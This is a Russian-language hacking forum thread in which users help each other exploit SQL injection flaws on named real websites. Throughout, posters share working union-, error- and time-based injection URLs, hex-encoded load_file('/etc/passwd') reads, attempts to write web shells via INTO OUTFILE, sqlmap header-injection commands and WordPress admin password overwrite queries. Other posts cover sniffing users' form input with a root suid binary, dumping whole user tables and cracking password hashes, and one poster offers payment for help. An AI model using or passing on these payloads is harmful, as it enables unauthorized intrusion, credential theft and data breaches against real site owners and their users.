экранируются кавычки. используйте hex или char

faza02 said:
экранируются кавычки. используйте hex или char


как использовать char я знаю но не подошло

а как и где конвертировать hex ?

MaxFast said:
Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.


если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так

как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером

mazaxaka said:
если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так
как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером


покажите phpinfo

izzy said:
как использовать char я знаю но не подошло
а как и где конвертировать hex ?


ошибка та же? вы уверены, что есть доступ к таблице mysql? проще проверить функцией load_file()

izzy said:
вопрос
хочю проверить наличие File_Priv
узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
получаю u1094094_sangha@дальше ip.
далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql. user+where+user='u1094094_sangha'--
и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог)
что делаю нетак?


Сначала проверь, есть ли доступ к mysql.user

union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+mysql.user

faza02 said:
покажите phpinfo


вот


Code:
ja-zdorov.com/images/php.php

kingbeef said:
Сначала проверь, есть ли доступ к mysql.user
union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+mysql.user


при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+mysql.user--

пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?

izzy said:
при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+mysql.user--
пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?


запрос:


Code:
SELECT 1 FROM mysql.user;

наличие доступа к бд mysql или наоборот, отсутствие, не говорит о том, что у пользователя нет file_priv. еще раз говорю, попробуйте load_file('/etc/passwd'). в вашем случае /etc/passwd надо заенкодить в hex.


mazaxaka said:
вот

Code:
ja-zdorov.com/images/php.php



отправьте доступ в лс, посмотрю

izzy said:
при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+mysql.user--
пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?


Значит нет доступа.

Подскажите,как вытащить есть таблица [users] стобцы из неё я могу прочитать,но вот дальше никак, таблица в квадратных скобках

madam said:
Подскажите,как вытащить есть таблица [users] стобцы из неё я могу прочитать,но вот дальше никак, таблица в квадратных скобках




Code:
SELECT 1,2,3,4,5 FROM `[users]`--

faza02 said:

Code:
SELECT 1,2,3,4,5 FROM `[users]`--




)) уже по разному пробовала,не хочет

http://bt c45.net/forum.php?sub=166 union select 1,2,3,4,TABLE_NAME,6,7 FROM INFORMATION_SCHEMA.TABLES LIMIT 98,1

кавычки фильтруются

колонки:


Code:
http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,column_NAME ,6,7+FROM+INFORMATION_SCHEMA.columns+where+table_n ame=0x5b75736572735d

записи из таблицы:


Code:
http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,login,6,7+F ROM+`[users]`+limit+4,1

что именно он не хочет?

faza02 said:
колонки:

Code:
http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,column_NAME ,6,7+FROM+INFORMATION_SCHEMA.columns+where+table_n ame=0x5b75736572735d

записи из таблицы:

Code:
http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,login,6,7+F ROM+`[users]`+limit+4,1

что именно он не хочет?



блин,всё поняла кавычки не те поставила (( спасиб

Есть админка, но запрещено заливать файлы .php только изображение, как можно залить шелл. Проинклудить не получается.

Что можно с этим сделать?

http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=bdd49c98329a5db8044c192d4033f887&tx_artbase[__referrer][extensionName]=Artbase&tx_artbase[__referrer][controllerName]=Search&tx_artbase[__referrer][actionName]=showSearchForm&tx_artbase[__hmac]=a:3:{s:11:%22searchfield%22;i:1;s:6:%22action%22; i:1;s:10:%22controller%22;i:1;}5165223b6f84dec570c cfd7b1d7a2f1958787a14&tx_artbase[searchfield]=a?

урезал лишнее

http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig

сайт на вп, есть рут бд, file_priv Y , админка заблочена по ип, прочитать файлы могу, а вот заливка при файл прив не работает, путь раскрыл. перепробовал все папки вп


select '' from mysql.user into outfile 'путь'


выдет ерор 13 cant create\write

mazaxaka said:
сайт на вп, есть рут бд, file_priv Y , админка заблочена по ип, прочитать файлы могу, а вот заливка при файл прив не работает, путь раскрыл. перепробовал все папки вп
выдет ерор 13 cant create\write


в /tmp льется?

kingbeef said:
в /tmp льется?


нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая

mazaxaka said:
нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая


Скорее всего при конфигурации не задана tmp директория. Ничего не поделать.

gromoza said:
Скорее всего при конфигурации не задана tmp директория. Ничего не поделать.


я наверное чегото не понимаю, а причем тут tmp , когда я пробую литься в другие дериктории

mazaxaka said:
я наверное чегото не понимаю, а причем тут tmp , когда я пробую литься в другие дериктории


http://www.cyberciti.biz/faq/mysqld-innodb-error-unable-to-create-temporary-file/

Файлы же льются не прямо в директорию(host ->dir), а host -> tmp ->dir.

mazaxaka said:
нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая


Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта?

5maks5 said:
Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта?


писал выше. админка заблочена на ип... в том то и проблема

mazaxaka said:
писал выше. админка заблочена на ип... в том то и проблема


покажите файл /wp-admin/.htaccess

папки в /wp-content/ все попробовали? соседей искали? что за ОС на сервере? что в файле wp-config.php написано? httpd.conf посмотрели?

На сайте имеется скрипт, в котором не фильтруется $_POST.

Такой код:

if (isset($_POST["name"]))

{

echo $_POST["name"];

exit();

}

Можно ли через это залить шелл?

blacksuccess said:
На сайте имеется скрипт, в котором не фильтруется $_POST.
Такой код:
if (isset($_POST["name"]))
{
echo $_POST["name"];
exit();
}
Можно ли через это залить шелл?


Вероятно, например, если вы поднимете свои права в системе с помощью XSS, а затем появится возможность выполнять произвольный код.

Вообще, http://php.net/manual/ru/function.echo.php

Кто поможет раскрутить, дам 4 wmz, оч надо)

http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig

ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"

5.0.95-log

http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,user(),12,13,14,15,16,17+--+

snowsoc@server

а теперь хочу узнать привилегии юзера

и тут завис

так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user='snowsoc'+--+

ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1

использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user=0x736e6f77736f63

ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'

что эта ошибка значит?

проверяю через LOAD_FILE('/etc/passwd')

http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,load_file%280x2f6574632f706173737764%29,12 ,13,14,15,16,17--+

выводит страницу сайта и число 10

это значить что привилегии у пользователя есть?

izzy said:
5.0.95-log
http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,user(),12,13,14,15,16,17+--+
snowsoc@server
а теперь хочу узнать привилегии юзера
и тут завис
так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user='snowsoc'+--+
ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1
использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user=0x736e6f77736f63
ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'
что эта ошибка значит?
проверяю через LOAD_FILE('/etc/passwd')
http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,load_file%280x2f6574632f706173737764%29,12 ,13,14,15,16,17--+
выводит страницу сайта и число 10
это значить что привилегии у пользователя есть?


если бы были привилегии, вы бы получили в ответе файл /etc/passwd

ошибка значит, что вы не можете сделать запрос к этой бд, потому что ее нет.

ознакомтесь со статьей /threadnav43966-1-10.html и прежде чем задавать вопрос поищите решение в гугле или поиском по форуму, на этот вопрос отвечали и не раз

DezMond™ said:
Кто поможет раскрутить, дам 4 wmz, оч надо)
http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig
ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"


Причем здесь деньги? "вопросы по уязвимостям".

У вас там CMS TYPO3, посмотрите публик сплоенты.

YaBtr said:
Причем здесь деньги? "
вопросы по уязвимостям
".
У вас там CMS TYPO3, посмотрите публик сплоенты.


Это вознагрождение)

то что там типо3 я и так знаю

Мне вот интересно, а как крутится эта инъекция:


Code:
comingoutspb.com/ru/materialyi-po-proektu?project=[inj]

MaxFast said:
Мне вот интересно, а как крутится эта инъекция:

Code:
comingoutspb.com/ru/materialyi-po-proektu?project=[inj]



error-based, например через updatexml

XPATH syntax error: ':5.5.41-0+wheezy1'

Есть рутовый суидник на сайте site.com

Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.

Поясню:

Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.

Aniweste said:
Есть рутовый суидник на сайте site.com
Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.
Поясню:
Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.


tcpdump

http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea@mail.com&FE%5Btt_address%5D%5Bname%5D=a'&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D= 3&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1

Чет вроде скуля не сложная, но немогу раскрутить...

ЗЫ при правильном вводе, ошибка пропадает, далее меняете 6l7fdfdea@mail.com на другое мыло

DezMond™ said:
http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea@mail.com&FE%5Btt_address%5D%5Bname%5D=a'&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D= 3&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
Чет вроде скуля не сложная, но немогу раскрутить...
ЗЫ при правильном вводе, ошибка пропадает, далее меняете 6l7fdfdea@mail.com на другое мыло




Code:
http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea44544@mail. com&FE%5Btt_address%5D%5Bname%5D=lol%27and%28extractva lue%281,concat%280x5c,version%28%29%29%29%29=%271&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D= %203&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1

XPATH syntax error: '\5.5.38-log'

Need help!

Имеется уязвимость в скрипте восстановления пароля на почту:


PHP:



При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.

Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.

Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.

Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.

Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?

http://www.gfz-potsdam.de/forschung/ueberblick/departments/department-4/anorganische-und-isotopengeochemie/mitarbeiter/profil/judith-schicks/list/?cHash=dd9ae84d8ccec2384f97ec748975f738&no_cache=1&tx_mkgfzstaffdirectory_normalview%5Bsectionid%5D=1 8

Кто подберёт колонки?

n4yk said:
Имеется уязвимость в скрипте восстановления пароля на почту:

PHP:


При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.
Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.
Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.
Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.
Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?


крутите как слепую если нет вывода

Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие


( success ( 2 2 ( ) ( edit-pipeline svndiff1 absent-entries commit-revprops depth log-revprops partial-replay ) ) )


подскажите как можно подключиться к ссш чтобы выполнять команды?

Пробывал по svn через различные клиента , не подключается

swat_ said:
Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие
подскажите как можно подключиться к ссш чтобы выполнять команды?
Пробывал по svn через различные клиента , не подключается


а что с 22 портом?

Br@!ns said:
а что с 22 портом?


закрыт

http://www.aua.gr/probata/index.php?id=11))+/*+

хелп

DezMond™ said:
http://www.aua.gr/probata/index.php?id=11))+/*+
хелп


Сходу вывод не получил.

Вслепую вектор будет следующим:


?id=(11)or(mid(version(),1,1)=4)


4 версия mysql, смотрите на временную задержку

YaBtr said:
Сходу вывод не получил.
Вслепую вектор будет следующим:
4 версия mysql, смотрите на временную задержку


Слепую то я раскрутил, нужен вывод...



//блин, дак так и ставьте вопрос YaBtr

faza02 said:
GET режется на 76 символе, вроде. нужен короткий вектор для mysql 4, я такого не видел.


я думал, может кто колонки подберёт, тут 2 подзапроса


http://www.aua.gr/probata/index.php?id=11))+order+by+2+/*+




http://www.aua.gr/probata/index.php?id=11))+union+select+1,2+/*+

Совместно сfaza02 и YaBtr:

Есть таблица images (одно из полей - image_id, второе - image). Доступна mysql.

Error-based:


Code:
id=1%20or%201%29%29%20group%20by%20concat%28versio n%28%29,floor%28rand%280%29*2х%29%29%20having%20m in%280%29%20or%201/*+

Подзапросы не работают. Составить запрос для прямого вывода из таблицы пока не удалось.

http://www.aua.gr/probata/index.php?id=1+or+1))+group+by+concat%28user(),flo or(rand(0)*2))+having+min(0)+or+1/*+


Как правильно обратиться к таблице mysql ?

DezMond™ said:
Как правильно обратиться к таблице mysql ?


error-based вектора для вывода для версии mysql 4.0 не существует на данный момент. в данной ситуации только time-based. однако у этого пользователя file_priv n

не пойму что за sql-inj такая тут

http://il2.aviasibir.ru/mow/?page=squads&squad_id=4+and+1=1

http://il2.aviasibir.ru/mow/?page=squads&squad_id=4

вроде есть, а вроде и нет...

мда, совсем не соображаю

Как вам такой вариант, коллега ?

_http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=5 TRUE

_http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=4 FALSE

Не могу добраться к БД:


Code:
http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --%20+

есть ли здесь уязвимость?


http://hobbygames.ru/u/index.php?route=product/product&product_id=36103

Unknowhacker said:
Не могу добраться к БД:

Code:
http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --%20+





Code:
ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')

MaxFast said:

Code:
ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')



Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц

EksTasy said:
есть ли здесь уязвимость?


Это Opencart, нет ничего.

Unknowhacker said:
Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц


waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором

Парни,я понял что blind sql injection - это сначала запрос вида

select count(*) from pages where id=...

а потом

select * from pages where id=...

В случае если первый запрос возвращает 0 -происходит редирект.

Вопрос. Как часто происходит редирект в blind sql injection

huntercs16 said:
Парни,я понял что blind sql injection - это сначала запрос вида
select count(*) from pages where id=...
а потом
select * from pages where id=...
В случае если первый запрос возвращает 0 -происходит редирект.
Вопрос. Как часто происходит редирект в blind sql injection


Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.

Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.

Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?

preno said:
Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?


./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%

Или

-r и путь к файлу с HTTP запросом


PHP:
POST/vuln.php HTTP/1.1

Host:www.target.com

User-Agent:Mozilla/4.0

id=1

Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"

yeti2 said:
Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"


Сразу задавайте вопросы в соответвствующей теме.

Strilo4ka вчера Вам отвечал:



yeti2 said:
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой



Code:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

только Вы немного темой ошиблись.


" if author else f"


yeti2 said:
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой



Code:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

только Вы немного темой ошиблись.

Export said:
Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.


Юзать последнюю версию WSO.

Вот что она умеет:

http://i.imgur.com/8huZtXJ.png

vikler said:
Ребят, помогите советом.
Есть очень важный для меня сайт, там MsSQLi,казалось бы, всё круто, но при попытке какого-то минимального подобия дампа уходит в даун всё приложение Connection max pool size overloaded.
И потом ждать почти день его возращения (благо, что это страница на сайте, которой уже не пользуются, так что не замечают).
Так вот, вроде в sqlmap'е приноровилась ставить delay 5 time-sec 80, но это просто ужас как медленно.
Всё бы ничего, но на этом сайте более 25к юзеров, это же займёт года слить всё
(
Кто-нибудь помогите неопытной девушке советом, а? Я в отчаянии


админка есть? может слить только администраторов и залиться?

sql инъекция

Помогите пожалуйста

когда делаю запрос через order by дает такой ответ

A Database Error Occurred

Error Number: 1054

Unknown column '3_order_by_80' in 'where clause'

SELECT * FROM authors where id=3_order_by_80 limit 0,1

можно из бд что то вытащить?

teh said:
Помогите пожалуйста
когда делаю запрос через order by дает такой ответ
A Database Error Occurred
Error Number: 1054
Unknown column '3_order_by_80' in 'where clause'
SELECT * FROM authors where id=3_order_by_80 limit 0,1
можно из бд что то вытащить?


откуда нижнее подчеркивание? почему limit? перечитайте статьи по sqli и пройдите хотя бы базовое введение в sql

faza02 said:
откуда нижнее подчеркивание? почему limit? перечитайте статьи по sqli и пройдите хотя бы базовое введение в sql


нет, я набираю 3 order by 80--

а в ответ получаю

A Database Error Occurred

Error Number: 1054

Unknown column '3_order_by_80' in 'where clause'

SELECT * FROM authors where id=3_order_by_80 limit 0,1

teh said:
нет, я набираю 3 order by 80--
а в ответ получаю
A Database Error Occurred
Error Number: 1054
Unknown column '3_order_by_80' in 'where clause'
SELECT * FROM authors where id=3_order_by_80 limit 0,1


"набери" 3+order+by+80-- или 3/**/order/**/by/**/80--

kingbeef said:
"набери" 3+order+by+80-- или 3/**/order/**/by/**/80--


да, я набирал, но выдает ошибку

An Error Was Encountered

The URI you submitted has disallowed characters.

И на коментарий и на плюс

teh said:
да, я набирал, но выдает ошибку
An Error Was Encountered
The URI you submitted has disallowed characters.
И на коментарий и на плюс


Так можно долго гадать какой вариант сработает, и по сути получается один оффтоп, хотите увидеть результат, публикуйте ссылку.

winstrool said:
Так можно долго гадать какой вариант сработает, и по сути получается один оффтоп, хотите увидеть результат, публикуйте ссылку.


http://4vlada.com/blogs/3

Есть способ заливки шелла через infophp.php при отсутствии инклуда?!

Unknowhacker said:
Есть способ заливки шелла через infophp.php при отсутствии инклуда?!


есть, но необходимо наличие фтп или цпанель

andrxx said:
есть, но необходимо наличие фтп или цпанель


ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ

lifescore said:
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом

PHP:
POST/vuln.php HTTP/1.1

Host:www.target.com

User-Agent:Mozilla/4.0

id=1



Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none

Пробую способ:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"

Вектор атаки найден:

Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#

Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user

После найденного вектора запускаю скрипт:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"

Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:

SELECT user(): None

И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!

Интересует вывод таблиц из этой инъекции:


Code:
http://naftogaz-europe.com

Note:в поле поиск '

Unknowhacker said:
Интересует вывод таблиц из этой инъекции:

Code:
http://naftogaz-europe.com

Note:
в поле поиск
'


'or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1

Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.

MaxFast said:
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.


mysqldump

MaxFast said:
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.


SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.

Единственный минус - будет долго рожать.

Базы от нескольких гб - от получаса.

Зато валидный дамп, что не может не радовать.

Ребят помогите советом )

При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?

Xsite said:
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?


слить быстрее через инъекцию основанную на задержках? ну не знаю склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.

Xsite said:
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?


Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где.

Могу показать, если дашь линк.

При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?


Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )

2BigBear на таком получится?

GET /registrierung/step0_vip.html HTTP/1.1

Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0

X-Requested-With: XMLHttpRequest

Referer: http://www.-----.de:80/

Host: www.lovepoint.de

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0

Вот пример из выше, сайт затер

http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)= 5,1,(select+1+union+select+2))=%271

TRUE - нет ошибки

http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)= 4,1,(select+1+union+select+2))=%271

FASLE - есть ошибка


grimnir said:
Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )
2BigBear на таком получится?
GET /registrierung/step0_vip.html HTTP/1.1
Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
X-Requested-With: XMLHttpRequest
Referer: http://www.lovepoint.de:80/
Host: www.lovepoint.de
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0


На этом попробуй также

http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319

хелп

DezMond™ said:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319
хелп


blind-mssql


Code:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319%20waitfor%20delay%20%270:0: 10%27--+

union-based mssql:


Code:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=-2012319%20UNION%20ALL%20SELECT%20@@version,%27lol% 27--

тыкаешь на lol, смотришь вывод

Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю

teh said:
Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю


Попей чаю, посмотри фильм, познай дзен в конце концов.

Вывод функции phpinfo() раскрывает лишь служебную информацию, такую как настройки определённых переменных и полные пути к скриптам на сайте.

Имея только чистый phpinfo() максимум, что можно провести Reflected-XSS через URL в старых версиях.

Обычно этот файл используется в совокупности с другими уязвимостями. И практически никогда (за исключением выше написанного) - без них.

нашел в site/info.php других уязвимостей не нашел. спасибо

А если хеш пароля не могу рашифровать онлайн, как еще можно разшифровать?

еще использовать программы для расшифровки, такие как hashcat, jtr, egb

